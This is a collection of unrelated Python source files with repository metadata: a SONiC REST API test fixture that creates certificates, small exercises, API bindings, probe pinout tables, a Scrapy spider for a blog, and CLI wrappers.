| 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 |
NOASSERTION
| 2023-03-29T16:13:55 | 2018-06-01T06:41:49 |
Python
|
UTF-8
|
Python
| false | false | 4,694 |
py
|
import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
'''
Create RESTAPI client certificates and copy the subject names to the config DB
'''
duthost = duthosts[rand_one_dut_hostname]
# Check if RESTAPI is enabled on the device
pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
"Test was not supported on devices which do not support RESTAPI!")
# Create Root key
local_command = "openssl genrsa -out restapiCA.key 2048"
localhost.shell(local_command)
# Create Root cert
local_command = "openssl req \
-x509 \
-new \
-nodes \
-key restapiCA.key \
-sha256 \
-days 1825 \
-subj '/CN=test.restapi.sonic' \
-out restapiCA.pem"
localhost.shell(local_command)
# Create server key
local_command = "openssl genrsa -out restapiserver.key 2048"
localhost.shell(local_command)
# Create server CSR
local_command = "openssl req \
-new \
-key restapiserver.key \
-subj '/CN=test.server.restapi.sonic' \
-out restapiserver.csr"
localhost.shell(local_command)
# Sign server certificate
local_command = "openssl x509 \
-req \
-in restapiserver.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiserver.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Create client key
local_command = "openssl genrsa -out restapiclient.key 2048"
localhost.shell(local_command)
# Create client CSR
local_command = "openssl req \
-new \
-key restapiclient.key \
-subj '/CN=test.client.restapi.sonic' \
-out restapiclient.csr"
localhost.shell(local_command)
# Sign client certificate
local_command = "openssl x509 \
-req \
-in restapiclient.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiclient.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Copy CA certificate and server certificate over to the DUT
duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
apply_cert_config(duthost)
urllib3.disable_warnings()
yield
# Perform a config load_minigraph to ensure config_db is not corrupted
config_reload(duthost, config_source='minigraph')
# Delete all created certs
local_command = "rm \
restapiCA.* \
restapiserver.* \
restapiclient.*"
localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
def get_endpoint(path):
duthost = duthosts[rand_one_dut_hostname]
RESTAPI_PORT = "8081"
netloc = duthost.mgmt_ip+":"+RESTAPI_PORT
try:
tup = ('https', netloc, path, '', '', '')
endpoint = urlunparse(tup)
except Exception:
logging.error("Invalid URL: "+endpoint)
return None
return endpoint
return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
VLAN_INDEX = 0
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
if mg_facts["minigraph_vlans"] != {}:
vlan_interfaces = list(mg_facts["minigraph_vlans"].values())[VLAN_INDEX]["members"]
if vlan_interfaces is not None:
return vlan_interfaces
return []
|
[
"[email protected]"
] | |
80954ebe7830dd8dfab25e0a013922bc01815edb
|
160ff0dbe7f9e5d740faa3ce13302190e1e5f1f0
|
/Calc.py
|
db893a216b2d9cc553077be5697b83b7af2224fd
|
[] |
no_license
|
sivatoms/PyReddy
|
9a84e1568e9ee6c16c2b51ba6044059d31ae62dd
|
fcc0ab8705d409c6b609f9b5f5cffb8900dd8eb7
|
refs/heads/master
| 2021-06-26T17:42:43.104598 | 2021-01-20T21:40:06 | 2021-01-20T21:40:06 | 197,511,789 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 187 |
py
|
from Demo import wish
def add(a, b):
    """Print (not return) the sum of a and b."""
    print(a + b)


def sub(a, b):
    """Print the difference a - b."""
    print(a - b)


def mul(a, b):
    """Print the product of a and b."""
    print(a * b)


def div(a, b):
    """Print the true-division quotient a / b."""
    print(a / b)
wish()
print("This is second modules")
|
[
"[email protected]"
] | |
03ff54224dfdb710b2127f90b62adc825688daf5
|
419637376e445ec9faf04c877d5fb6c09d15903f
|
/steam/admin/activity/productAuditService.py
|
ec92efa0a2a88750d9fbbdda4e0b8a68c42dbce8
|
[] |
no_license
|
litaojun/steamOmTest
|
e4203df30acafaa5e282631d77429c0e4483fb88
|
86f84dbd802d947198823e02c2f1ba2695418a76
|
refs/heads/master
| 2020-04-02T21:48:55.115389 | 2019-07-11T06:08:27 | 2019-07-11T06:08:27 | 154,812,217 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
from steam.util.httpUopService import HttpUopService
from opg.bak.uopService import decorator
class ProductAuditService(HttpUopService):
    '''
    Audit-activity service: wraps the HTTP UOP request that audits an
    activity.  (Original docstring in Chinese: "审核活动" = "audit activity".)
    '''
    def __init__(self, kwargs):
        # `kwargs` is forwarded as the SQL value dict; module and filename are
        # intentionally left blank for this service.
        super(ProductAuditService, self).__init__(module = "",
                                                filename = "",
                                                sqlvaluedict = kwargs )
    @decorator(["setupAuditActivity"])
    def optAuditActivity(self):
        # Fires the prepared HTTP request; "setupAuditActivity" is handled by
        # the decorator before the request is sent.
        self.sendHttpReq()
|
[
"[email protected]"
] | |
043726843b64f7026111458e53c6551599ad3e12
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03328/s713805169.py
|
9bf51a8dd2d62f9ce6c096b400cb84417951bd79
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 454 |
py
|
import sys
import math
import itertools
import collections
import heapq
import re
import numpy as np
from functools import reduce
# Competitive-programming stdin helpers (read raw line / tokens / ints).
rr = lambda: sys.stdin.readline().rstrip()
rs = lambda: sys.stdin.readline().split()
ri = lambda: int(sys.stdin.readline())
rm = lambda: map(int, sys.stdin.readline().split())
rl = lambda: list(map(int, sys.stdin.readline().split()))
inf = float('inf')
mod = 10**9 + 7  # common contest modulus (unused in this solution)
# Read A and B, then print T(B-A) - B where T(n) = n*(n+1)//2 is the
# n-th triangular number.
a, b = rm()
c = b - a
c = c*(c+1)//2
print(c-b)
|
[
"[email protected]"
] | |
f096553bf112edde9a685cccede57835e9c15dd8
|
392a35174450d1151d276481be4bb4c1ed1fc841
|
/chapter-05/Q06_conversion.py
|
d280bd750de009a1f698bee7dc71814d7822e90f
|
[] |
no_license
|
jcockbain/ctci-solutions
|
8f96a87532a7581cdfc55c29c8684fcdfab77a62
|
6854e9f6c7074ae22e01c3e5f6c03f641e507cd7
|
refs/heads/master
| 2023-01-15T16:59:58.038900 | 2020-11-28T09:14:36 | 2020-11-28T09:14:36 | 202,898,842 | 6 | 0 | null | 2020-11-28T09:14:37 | 2019-08-17T15:33:25 |
Python
|
UTF-8
|
Python
| false | false | 254 |
py
|
import unittest
def conversion(n1, n2):
    """Return how many bits must be flipped to convert *n1* into *n2*.

    The differing bits are exactly the set bits of ``n1 ^ n2``, so the answer
    is that value's popcount.  Counting via ``bin(...).count('1')`` replaces
    the original Brian Kernighan loop (``c &= c - 1``), which never terminated
    for a negative XOR: Python ints sign-extend infinitely, so a negative ``c``
    stays truthy forever.
    """
    return bin(n1 ^ n2).count("1")
class Test(unittest.TestCase):
    # CtCI regression case: 29 (11101) vs 15 (01111) differ in exactly 2 bits.
    def test_conversion(self):
        self.assertEqual(2, conversion(29, 15))
|
[
"[email protected]"
] | |
d3c04239cbf82fb6c83edd7f0d839a76a25a1fb7
|
c19ca6779f247572ac46c6f95327af2374135600
|
/backtrack/leetcode 784 Letter Case Permutation.py
|
7145ae98631ee4d97b9ba49b7d4cfe96f90f5f24
|
[] |
no_license
|
clhchtcjj/Algorithm
|
aae9c90d945030707791d9a98d1312e4c07705f8
|
aec68ce90a9fbceaeb855efc2c83c047acbd53b5
|
refs/heads/master
| 2021-01-25T14:24:08.037204 | 2018-06-11T14:31:38 | 2018-06-11T14:31:38 | 123,695,313 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,006 |
py
|
__author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
    # Backtracking solver for LeetCode 784 (Letter Case Permutation):
    # enumerate every string obtained by toggling the case of each letter.
    def __init__(self):
        self.S = []             # input string being permuted
        self.answer = []        # current partial permutation (list of chars)
        self.total_answer = []  # all completed permutations
    def is_a_solution(self,k):
        # A permutation is complete once every position of S has been chosen.
        return k == len(self.S)
    def process_solution(self):
        self.total_answer.append(''.join(self.answer))
    def constact_candiates(self, k):
        # NOTE(review): method name is a typo of "construct_candidates";
        # kept as-is since callers use this spelling.
        # For a letter, offer both cases; ord > 96 means lowercase ASCII and
        # +/-32 toggles the case.  Non-letters have a single candidate.
        if self.S[k].isalpha():
            if ord(self.S[k]) > 96:
                return [self.S[k],chr(ord(self.S[k])-32)]
            else:
                return [chr(ord(self.S[k])+32),self.S[k]]
        else:
            return [self.S[k]]
    def backtrack(self,k):
        # Standard backtracking: try each candidate for position k, recurse,
        # then undo the choice.
        if self.is_a_solution(k):
            self.process_solution()
        else:
            k = k + 1
            candidates = self.constact_candiates(k-1)
            for ch in candidates:
                self.answer.append(ch)
                self.backtrack(k)
                self.answer.pop()
                # NOTE(review): after the pop, len(self.answer) == k - 1, so
                # this guard appears unreachable (dead code) — confirm before
                # removing.
                if k == len(self.answer):
                    return
    def letterCasePermutation(self, S):
        """
        Entry point: return all case permutations of S.
        :type S: str
        :rtype: List[str]
        """
        self.S = S
        self.backtrack(0)
        return self.total_answer
# 简单解法
# def letterCasePermutation(self, S):
# ans = [[]]
#
# for char in S:
# n = len(ans)
# if char.isalpha():
# for i in range(n):
# ans.append(ans[i][:])
# ans[i].append(char.lower())
# ans[n+i].append(char.upper())
# else:
# for i in range(n):
# ans[i].append(char)
# # temp = list(map("".join, ans))
# # print(temp)
# return list(map("".join, ans))
if __name__ == "__main__":
S = Solution()
print(S.letterCasePermutation("a1b2"))
|
[
"[email protected]"
] | |
56a2b628001cbc8b80e9af74b4972644b513bd67
|
81407be1385564308db7193634a2bb050b4f822e
|
/library/lib_study/138_mm_imghdr.py
|
b2e25a38bf54fb2a4859d179ee87719fc5ae4348
|
[
"MIT"
] |
permissive
|
gottaegbert/penter
|
6db4f7d82c143af1209b4259ba32145aba7d6bd3
|
8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d
|
refs/heads/master
| 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 |
MIT
| 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null |
UTF-8
|
Python
| false | false | 210 |
py
|
# The imghdr module guesses the image type of a file or byte stream.
# (Original comment in Chinese: "imghdr模块 推测文件或字节流中的图像的类型".)
import imghdr
# Prints the detected type of the local file, e.g. "gif".
print(imghdr.what('bass.gif'))
# gif
# Recognised image types: https://docs.python.org/zh-cn/3/library/imghdr.html#imghdr.what
|
[
"[email protected]"
] | |
ee9ade01e55751cb4ad59fad7e8007aa52bf3c2d
|
d5b339d5b71c2d103b186ed98167b0c9488cff09
|
/marvin/cloudstackAPI/createCounter.py
|
a4ed8386ce48bc5d359fb2c7235ada34f89378f4
|
[
"Apache-2.0"
] |
permissive
|
maduhu/marvin
|
3e5f9b6f797004bcb8ad1d16c7d9c9e26a5e63cc
|
211205ae1da4e3f18f9a1763f0f8f4a16093ddb0
|
refs/heads/master
| 2020-12-02T17:45:35.685447 | 2017-04-03T11:32:11 | 2017-04-03T11:32:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,275 |
py
|
"""Adds metric counter"""
from baseCmd import *
from baseResponse import *
class createCounterCmd (baseCmd):
    # Generated marvin binding for the async CloudStack "createCounter" API.
    # The bare triple-quoted strings below are no-op statements used by the
    # generator as per-field documentation; they have no runtime effect.
    # NOTE(review): typeInfo is a class attribute, so the item assignments in
    # __init__ mutate one dict shared by every instance — confirm intended.
    typeInfo = {}
    def __init__(self):
        self.isAsync = "true"
        """Name of the counter."""
        """Required"""
        self.name = None
        self.typeInfo['name'] = 'string'
        """Source of the counter."""
        """Required"""
        self.source = None
        self.typeInfo['source'] = 'string'
        """Value of the counter e.g. oid in case of snmp."""
        """Required"""
        self.value = None
        self.typeInfo['value'] = 'string'
        # Parameters the API requires the caller to supply.
        self.required = ["name", "source", "value", ]
class createCounterResponse (baseResponse):
    # Generated marvin binding for the "createCounter" API response fields.
    # As in the command class above? No — independently: the bare strings are
    # generator-emitted field docs (no-op statements), and typeInfo is a
    # class-level dict mutated through the instance.
    typeInfo = {}
    def __init__(self):
        """the id of the Counter"""
        self.id = None
        self.typeInfo['id'] = 'string'
        """Name of the counter."""
        self.name = None
        self.typeInfo['name'] = 'string'
        """Source of the counter."""
        self.source = None
        self.typeInfo['source'] = 'string'
        """Value in case of snmp or other specific counters."""
        self.value = None
        self.typeInfo['value'] = 'string'
        """zone id of counter"""
        self.zoneid = None
        self.typeInfo['zoneid'] = 'string'
|
[
"[email protected]"
] | |
087a67e5405e3ada78f98dc48c3379436a96b3a2
|
6ac723c541e410f737be68f0af634c738e881d74
|
/probes.py
|
abd27d07112f5ce2f0c88bd8935838e6c005df25
|
[] |
no_license
|
cxrodgers/Adapters
|
d478616372ca9fbfc55a886d5b384a15b01a7b91
|
da68169c4bb8d8f3c4df13205df2626635632cb8
|
refs/heads/master
| 2022-12-22T07:46:25.588285 | 2022-12-09T15:21:54 | 2022-12-09T15:21:54 | 4,681,174 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,830 |
py
|
"""Pinout for each probe, from channel numbers to Samtec numbers."""
from builtins import range
import Adapters
## This is for Adrian's 1x8 shank array
# This one goes from "electrode #" (depth?) to "interposer PCB #"
adrian_8shank2interposer = Adapters.Adapter(
[27, 25, 21, 20, 9],
[41, 45, 53, 55, 52],
)
# This one goes from interposer PCB # to Samtec numbers
# This uses the little handbuild adapter I made that is an ON1 (I think)
# superglued to a breadboard PCB and hand-wired.
# Here I will use 41-80 as Samtec numbers, with 1 in the upper left when
# looking into the next adapter (out of the probe).
# The reason to use 41-80 is because this will be used with the bottom
# connector on ON4.
interposer2samtec = Adapters.Adapter([
33, 34, 35, 36, 37, 38, 39, 40, # first column (shank side to top side)
41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, #52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, 63,
64, 60, 56,
]
)
# Hack the above
# The inner column of interposer doesn't have any useful sites, according
# to Adrian. And the outer column of my adapter isn't wired up fully.
# So, shift the interposer such that its inner column is floating.
# Same as above, except
interposer2samtec_shifted = Adapters.Adapter([
#33, 34, 35, 36, 37, 38, 39, 40, # first (innermost) column (shank side to top side)
48, 47, 46, 45, 44, 43, 42, 41, # second column (shank side to top side)
#41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, 52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, #63,
#64, 60, 56,
]
)
## End Adrian's array
# This is the A32 connector pinout from neuronexus.
# Takes us from "Samtec numbers" to Neuronexus channel numbers.
# Samtec numbers go from 1-40, with 1 in the upper right when looking at
# the probe, or 1 in the upper left when looking at the adapter.
samtec2nn = Adapters.Adapter(list(range(1, 41)), [
11, 'GND', 'GND', 32,
9, 'REF', 'NC', 30,
7, 'NC', 'NC', 31,
5, 'NC', 'NC', 28,
3, 1, 26, 29,
2, 4, 24, 27,
6, 13, 20, 25,
8, 14, 19, 22,
10, 15, 18, 23,
12, 16, 17, 21,
])
# This is for the Janelia pinout
# As before, Samtec numbers go from 1-40, with 1 in the upper right when
# looking at the probe. The source doc from Tim Harris shows the back side
# of the probe, so 1 is in the upper left (as it is for the adapter).
samtec2janelia_top = Adapters.Adapter(list(range(1, 41)), [
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
])
samtec2janelia_bottom = Adapters.Adapter(list(range(1, 41)), [
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
])
# A 64-channel version with two samtecs, 1-40 on the top and 41-80 on the bottom
samtec2janelia_64ch = Adapters.Adapter(list(range(1, 81)),
[
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
])
|
[
"[email protected]"
] | |
161ef121e5f50f8ab2a32b0600ab9a65c050b69b
|
01b49cefcb2e1aae896a444e525c4cd09aff68be
|
/nyankobiyori.py
|
5e84f044fb388d972b61ccd0aeeb3abbcb0436e1
|
[
"MIT"
] |
permissive
|
ikeikeikeike/scrapy-2ch-summary-spiders
|
308eccbe83bfc03064ec4b7a9b3952985bf58a15
|
7142693f25025a09390377649a727cfd33d15af3
|
refs/heads/master
| 2020-04-01T18:04:38.319532 | 2015-01-08T08:30:16 | 2015-01-08T08:30:16 | 28,956,442 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,625 |
py
|
# -*- coding: utf-8 -*-
import re
import itertools
from scrapy import log
from scrapy.selector import Selector
from summaries.items import SummariesItem
from thread_float_bbs import (
SequenceAppend,
ThreadFloatBbsSpider
)
class NyankobiyoriSpider(ThreadFloatBbsSpider):
    """Scrapy spider for nyankobiyori.com (2ch summary blog).

    Python 2 code (uses ``itertools.izip`` and ``u""`` literals).
    """
    name = 'nyankobiyori'
    allowed_domains = ['nyankobiyori.com']
    start_urls = ['http://nyankobiyori.com/index.rdf']
    def spider_page(self, response):
        """Scrape one article page into a SummariesItem."""
        sel = Selector(response)
        image_urls = []
        # SequenceAppend auto-numbers each appended subject/body pair via the
        # "index" counter.
        contents = SequenceAppend({
            "index": int,
            "subject": '',
            "body": ''
        })
        # Main: pair each post header (.t_h) with its body (.t_b).
        main = sel.css('div.body')
        generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
        for sub, body in generator:
            image_urls.extend(sub.css('img').xpath('@src').extract())
            image_urls.extend(body.css('img').xpath('@src').extract())
            contents.append({
                "subject": sub.extract(),
                "body": body.extract()
            })
        # body more: same extraction for the "read more" continuation section.
        main = sel.css('div.bodymore')
        generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
        for sub, body in generator:
            image_urls.extend(sub.css('img').xpath('@src').extract())
            image_urls.extend(body.css('img').xpath('@src').extract())
            contents.append({
                "subject": sub.extract(),
                "body": body.extract()
            })
        item = dict(
            posted=False,
            source=self.extract_source(sel),
            url=response.url,
            title=self.get_text(sel.css('h1 span')),
            tags=self.extract_tags(sel, response),
            contents=contents.result(),
            image_urls=image_urls
        )
        # set title from source.
        return self.request_title(item['source'], SummariesItem(**item))
    def extract_source(self, selector):
        """Extract the source-thread URL (original docstring: "Sourceを抽出").

        Picks the first span text mentioning 2ch.net / 2ch.sc / logsoku and
        pulls the URL out with a regex; returns None on any failure.
        """
        try:
            url = [
                text for
                text in selector.css('div.bodymore span').xpath('text()').extract()
                if text.find('2ch.net') != -1
                or text.find('2ch.sc') != -1
                or text.find('www.logsoku.com') != -1
            ][0]
            # The closing bracket 「」」 terminates the URL in the blog markup.
            return re.search(u"(?P<url>https?://[^\s][^」]+)", url).group("url").strip()
        except Exception as exc:
            log.msg(
                format=("Extract source (error): "
                        "Error selector %(selector)s "
                        "url `%(url)s`: %(errormsg)s"),
                level=log.WARNING,
                spider=self,
                selector=selector,
                url=selector.response.url,
                errormsg=str(exc))
            return None
    def extract_tags(self, selector, response):
        """Extract article tags (original docstring: "tagsを抽出").

        Combines the feed's first category term with on-page tag links,
        de-duplicated; returns [] on any failure.
        """
        try:
            feed = self.get_feed(response.url)
            tags = [
                self.get_text(tag)
                for tag in selector.css('p[class^=category_] a,p.tag a')
            ]
            return list(set([feed['tags'][0]['term']] + tags))
        except Exception as exc:
            log.msg(
                format=("Extract tags (error): "
                        "Error selector %(selector)s "
                        "url `%(url)s`: %(errormsg)s"),
                level=log.WARNING,
                spider=self,
                selector=selector,
                url=response.url,
                errormsg=str(exc))
            return []
|
[
"[email protected]"
] | |
09efa3e2cc46a870ee131e9c706297c18b8b44e4
|
2db5bf5832ddb99e93bb949ace1fad1fde847319
|
/beginLearn/googleclass/class4/pdtest.py
|
3b933a6cef80f4c7bb2ba24fc99b874212470863
|
[] |
no_license
|
RoderickAdriance/PythonDemo
|
2d92b9aa66fcd77b6f797e865df77fbc8c2bcd14
|
98b124fecd3a972d7bc46661c6a7de8787b8e761
|
refs/heads/master
| 2020-04-06T17:36:46.000133 | 2018-11-15T07:07:03 | 2018-11-15T07:07:03 | 157,666,809 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 711 |
py
|
import pandas as pd
import numpy as np
# Small pandas exercise (Google ML crash course style): build a cities frame,
# derive columns, and reindex with out-of-range labels.
city_names=pd.Series(['San Francisco', 'San Jose', 'Sacramento'])
population = pd.Series([852469, 1015785, 485199])
cities = pd.DataFrame({'City name': city_names, 'Population': population})
california_housing_dataframe=pd.read_csv('data.csv')
california_housing_dataframe.hist('housing_median_age')
# population=population/1000
# np.log is the natural log (base e), not base 10.
# (Original comment in Chinese: "log 实际上不是以10为底,而是以 e 为底".)
log_population = np.log(population)
apply = population.apply(lambda val: val > 500000)
cities['Area square miles']=pd.Series([46.87, 176.53, 97.92])
cities['Population density']=cities['Population']/cities['Area square miles']
# Reindexing with labels 5 and 8 (absent from the frame) yields NaN rows.
reindex = cities.reindex([0, 5, 2, 8])
print(reindex)
|
[
"[email protected]"
] | |
0a06a2b02ea2ebe7e1e750ff6fcf6079526a4e8e
|
53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61
|
/.history/EMR/zhzd_add_20190618132817.py
|
d0748388e5fbee29a405014068576007a52ae777
|
[] |
no_license
|
cyc19950621/python
|
4add54894dc81187211aa8d45e5115903b69a182
|
d184b83e73334a37d413306d3694e14a19580cb0
|
refs/heads/master
| 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 766 |
py
|
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
import pandas as pd
# Pair each diagnosis file with the same-named sex file and append the sex
# file's lines to the diagnosis file's line list.
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRzhzd5')  # diagnosis txt files
emrtxt2s = EMRdef.txttq(u'D:\DeepLearning ER\EHRsex')  # sex txt files
ryzd = []  # NOTE(review): never used below — kept in case later code needs it
for emrtxt in emrtxts:
    # errors="ignore" tolerates undecodable (Chinese-encoded) bytes; the
    # with-blocks fix the original's leaked file handles.
    with open(emrtxt, 'r', errors="ignore") as f:
        lines = f.readlines()
    emrpath = os.path.basename(emrtxt)
    emrpath = os.path.splitext(emrpath)[0]  # file name sans extension = record id
    for emrtxt2 in emrtxt2s:
        emrpath2 = os.path.basename(emrtxt2)
        # Bug fix: the original called os.path.splitext(emrpat2) — an
        # undefined name — which raised NameError on the first iteration.
        emrpath2 = os.path.splitext(emrpath2)[0]
        if emrpath != emrpath2:
            continue
        with open(emrtxt2, 'r', errors="ignore") as f2:
            lines2 = f2.readlines()
        # Matches the original behaviour: the whole list is appended as one
        # nested element (not extended).
        lines.append(lines2)
|
[
"[email protected]"
] | |
953d8bc38856a27f6a9df03d5819e05e01559c06
|
646b0a41238b96748c7d879dd1bf81858651eb66
|
/src/mdt/orm/GulpOpt.py
|
177f7a316baa5b0cda918805763bfe60e8fcfac3
|
[] |
no_license
|
danse-inelastic/molDynamics
|
ded0298f8219064e086472299e1383d3dff2dac3
|
c8e0bfd9cb65bcfc238e7993b6e7550289d2b219
|
refs/heads/master
| 2021-01-01T19:42:29.904390 | 2015-05-03T17:27:38 | 2015-05-03T17:27:38 | 34,993,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,749 |
py
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# J Brandon Keith, Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from ..GulpOpt import GulpOpt
from Gulp import Gulp
class Inventory(Gulp.Inventory):
    """User-configurable traits for GULP geometry optimisation (extends Gulp.Inventory)."""
    # Optimise atomic coordinates (on by default).
    optimize_coordinates = Gulp.Inventory.d.bool(name = 'optimize_coordinates', default = True)
    optimize_coordinates.label = 'Optimize coordinates?'
    # Also optimise the unit cell (off by default).
    optimize_cell = Gulp.Inventory.d.bool(name = 'optimize_cell', default = False)
    optimize_cell.label = 'Optimize the cell?'
    # Optimisation constraint, restricted to the three validated choices below.
    constraint = Gulp.Inventory.d.str(name = 'constraint', default = 'constant volume')
    constraint.label = 'Constraint'
    constraint.validator = Gulp.Inventory.v.choice(['None', 'constant volume', 'constant pressure'])
    # XXX: see Gulp.py
#    trajectoryfile = Gulp.Inventory.d.str(name = 'trajectoryfile', default = 'gulp.his')
#    trajectoryfile.label = 'Trajectory Filename'
#    restartfile = Gulp.Inventory.d.str(name = 'restartfile', default = 'gulp.res')
#    restartfile.label = 'Restart Filename'
GulpOpt.Inventory = Inventory
def customizeLubanObjectDrawer(self, drawer):
    """Configure the Luban drawer panel order for a GulpOpt node.

    Builds the orderings in locals first, then assigns them to the drawer —
    behaviourally identical to assigning inline.
    """
    panel_order = ['properties', 'forcefield']
    mold_order = [
        'optimize_coordinates',
        'optimize_cell',
        'constraint',
        'temperature',
        'pressure',
        'identify_molecules',
        'assign_bonds_from_initial_geometry',
        'calc_dispersion_in_recip_space',
    ]
    drawer.sequence = panel_order
    drawer.mold.sequence = mold_order
    return
GulpOpt.customizeLubanObjectDrawer = customizeLubanObjectDrawer
|
[
"[email protected]"
] | |
01b65fa62f033ee2bb173040766119fcba0b4fe2
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/pinpoint_write_2/endpoint_delete.py
|
cf53331aefddda4f6a700adcbf0325709acdb957
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,101 |
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-endpoint.html
if __name__ == '__main__':
    # The bare triple-quoted string below is a no-op statement kept as
    # in-place documentation of related API calls.
    """
    get-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-endpoint.html
    update-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-endpoint.html
    """
    # Help text shown to the user describing the two required parameters.
    parameter_display_string = """
    # application-id : The unique identifier for the application. This identifier is displayed as the Project ID on the Amazon Pinpoint console.
    # endpoint-id : The unique identifier for the endpoint.
    """
    add_option_dict = {}
    add_option_dict["parameter_display_string"] = parameter_display_string
    # ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
    # Delegates to the shared helper that drives `aws pinpoint delete-endpoint`.
    write_two_parameter("pinpoint", "delete-endpoint", "application-id", "endpoint-id", add_option_dict)
|
[
"[email protected]"
] | |
210ea9a60a611db409d76c3c0405210c78d2cfcc
|
2b7cd8141d6c17572c05d4d70e3e616e02449e72
|
/python/GafferSceneUI/CollectScenesUI.py
|
341298801206215eb7677d5fcea14b99ce048bf9
|
[
"BSD-3-Clause"
] |
permissive
|
gray10b/gaffer
|
45aefd4ebbf515d5b491777a3bfd027d90715114
|
828b3b59f1154b0a14020cbf9a292c9048c09968
|
